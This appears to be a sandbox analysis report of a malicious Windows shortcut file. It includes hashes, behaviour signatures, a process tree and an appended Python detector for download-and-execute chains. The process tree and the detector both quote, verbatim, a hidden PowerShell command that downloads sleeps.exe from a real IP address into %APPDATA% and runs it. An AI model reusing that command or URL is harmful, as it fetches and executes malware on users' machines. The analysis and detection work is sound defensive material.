Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system -
submitted
06-12-2023 01:09
Static task
static1
Behavioral task
behavioral1
Sample
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
Resource
win10v2004-20231127-en
General
-
Target
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
-
Size
1KB
-
MD5
92cff55b70b6556b395300de968521fc
-
SHA1
4bfccd1a6dc2a775a497074caecf25386dab49fb
-
SHA256
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d
-
SHA512
7b59f385a7bacba7a87479837218f1399894480f2b4ae60811d0c4ec180cfbfde6170ecb0b369f4dd0cd75af02a216b5659e714d7c53d439394664505a9311fe
Malware Config
Signatures
-
Drops file in System32 directory 1 IoCs
Processes:
description: File opened for modification
ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
process: powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
pid: 2668
process: powershell.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
description: Token: SeDebugPrivilege
pid: 2668
process: powershell.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
description                        pid    process    target process
PID 2696 wrote to memory of 2724   2696   cmd.exe    cmd.exe
PID 2696 wrote to memory of 2724   2696   cmd.exe    cmd.exe
PID 2696 wrote to memory of 2724   2696   cmd.exe    cmd.exe
PID 2724 wrote to memory of 2668   2724   cmd.exe    powershell.exe
PID 2724 wrote to memory of 2668   2724   cmd.exe    powershell.exe
PID 2724 wrote to memory of 2668   2724   cmd.exe    powershell.exe
Processes
-
C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
  - Suspicious use of WriteProcessMemory
  PID:2696
    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -windowstyle hidden -command "& {Invoke-WebRequest -Uri 'http://185.196.9.20/test/sleeps.exe' -OutFile $env:APPDATA\newfile.exe; Start-Process $env:APPDATA\newfile.exe}"
      - Suspicious use of WriteProcessMemory
      PID:2724
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -windowstyle hidden -command "& {Invoke-WebRequest -Uri 'http://185.196.9.20/test/sleeps.exe' -OutFile $env:APPDATA\newfile.exe; Start-Process $env:APPDATA\newfile.exe}"
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:2668
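The process tree above is the whole story of this sample: a LNK launched through cmd.exe, a second cmd.exe, and a hidden powershell.exe that fetches sleeps.exe over plain HTTP from a bare IP, writes it under %APPDATA% and starts it. The following is an added example, not part of the sandbox report: a small Python detector that walks a process tree of this shape, scores the PowerShell command line for the download-and-execute pattern and extracts the IOCs (URL, host, dropped path). The process records are constructed from the report's own tree (PIDs and command lines copied as shown); the benign control tree, the signal names, weights and verdict threshold are this example's assumptions, not the sandbox's scoring.

```python
"""Flag a LNK -> cmd.exe -> powershell.exe download-and-execute chain in a
sandbox process tree and pull the IOCs out of the PowerShell command line.

Added example, not part of the sandbox report. SAMPLE_TREE is constructed
from the report's process tree; BENIGN_TREE, the signal names, weights and
thresholds are this example's own assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


# Constructed from the report: the three processes of the chain.
LNK = (r"C:\Users\Admin\AppData\Local\Temp\d3ab1b047a1ee9985c00c95cd4d205f7"
       r"9bdf47ade1f18ee30ec9d88a58cb133d.lnk")
PS_CMD = ('powershell.exe -windowstyle hidden -command "& {Invoke-WebRequest '
          "-Uri 'http://185.196.9.20/test/sleeps.exe' "
          r"-OutFile $env:APPDATA\newfile.exe; "
          r'Start-Process $env:APPDATA\newfile.exe}"')
SAMPLE_TREE = [
    Proc(2696, None, r"C:\Windows\system32\cmd.exe", "cmd /c " + LNK),
    Proc(2724, 2696, r"C:\Windows\System32\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c ' + PS_CMD),
    Proc(2668, 2724,
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
]
# Constructed benign control (assumption): an admin listing a directory.
BENIGN_TREE = [
    Proc(100, None, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(101, 100,
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp"),
]

# Heuristics over the command line. -w\w* accepts the abbreviated forms
# PowerShell allows for -WindowStyle (-w, -win, ...); h\w* covers "hidden".
HIDDEN_RE = re.compile(r"-w\w*\s+h\w*", re.I)
DOWNLOAD_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadFile|"
    r"DownloadString|Start-BitsTransfer|curl|wget)\b", re.I)
EXEC_RE = re.compile(
    r"\b(?:Start-Process|saps|Invoke-Expression|iex|Invoke-Item)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"`;)}]+", re.I)
OUTFILE_RE = re.compile(r"-OutFile\s+['\"]?([^\s'\";]+)", re.I)
BARE_IP_RE = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/", re.I)
USER_DIR_RE = re.compile(
    r"\$env:(?:APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE|PUBLIC)\b|"
    r"\\AppData\\|\\Temp\\|\\Users\\Public\\", re.I)

# Assumed weights; tune against your own telemetry.
WEIGHTS = {"hidden_window": 1, "download_cmdlet": 2, "plain_http": 1,
           "bare_ip_host": 2, "drops_to_user_dir": 1,
           "executes_download": 3, "cmd_parent": 1, "lnk_in_ancestry": 2}


def ancestors(tree: List[Proc], proc: Proc) -> List[Proc]:
    """Parent, grandparent, ... of proc, nearest first."""
    by_pid = {p.pid: p for p in tree}
    chain, cur = [], proc
    while cur.ppid is not None and cur.ppid in by_pid:
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def analyze(tree: List[Proc]) -> List[Dict]:
    """One finding per powershell.exe process: signals, score, IOCs, verdict."""
    findings = []
    for p in tree:
        if not p.image.lower().endswith("powershell.exe"):
            continue
        cl, signals = p.cmdline, []
        urls = URL_RE.findall(cl)
        out = OUTFILE_RE.search(cl)
        dropped = out.group(1) if out else None
        if HIDDEN_RE.search(cl):
            signals.append("hidden_window")
        if DOWNLOAD_RE.search(cl):
            signals.append("download_cmdlet")
        if any(u.lower().startswith("http://") for u in urls):
            signals.append("plain_http")
        if any(BARE_IP_RE.match(u) for u in urls):
            signals.append("bare_ip_host")
        if dropped and USER_DIR_RE.search(dropped):
            signals.append("drops_to_user_dir")
        # The downloaded path is referenced again next to an execution verb.
        if dropped and EXEC_RE.search(cl) and cl.count(dropped) >= 2:
            signals.append("executes_download")
        parents = ancestors(tree, p)
        if parents and parents[0].image.lower().endswith("cmd.exe"):
            signals.append("cmd_parent")
        if any(".lnk" in a.cmdline.lower() for a in parents):
            signals.append("lnk_in_ancestry")
        score = sum(WEIGHTS[s] for s in signals)
        if "download_cmdlet" in signals and "executes_download" in signals:
            verdict = "download_and_execute"
        elif score >= 4:
            verdict = "suspicious"
        else:
            verdict = "low"
        hosts = [m.group(1) for m in map(BARE_IP_RE.match, urls) if m]
        findings.append({"pid": p.pid, "signals": signals, "score": score,
                         "urls": urls, "hosts": hosts, "dropped": dropped,
                         "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_TREE) + analyze(BENIGN_TREE):
        print(f)
```

On the report's tree this yields one finding for PID 2668 with verdict download_and_execute, the URL http://185.196.9.20/test/sleeps.exe, host 185.196.9.20 and the dropped path $env:APPDATA\newfile.exe; the benign control scores zero. To run it on live data, build the Proc records from Sysmon Event ID 1 (ProcessCreate supplies ProcessId, ParentProcessId, Image and CommandLine). The regexes are deliberately loose: they will not see a command hidden behind -EncodedCommand, so decode Base64 command lines before scoring them.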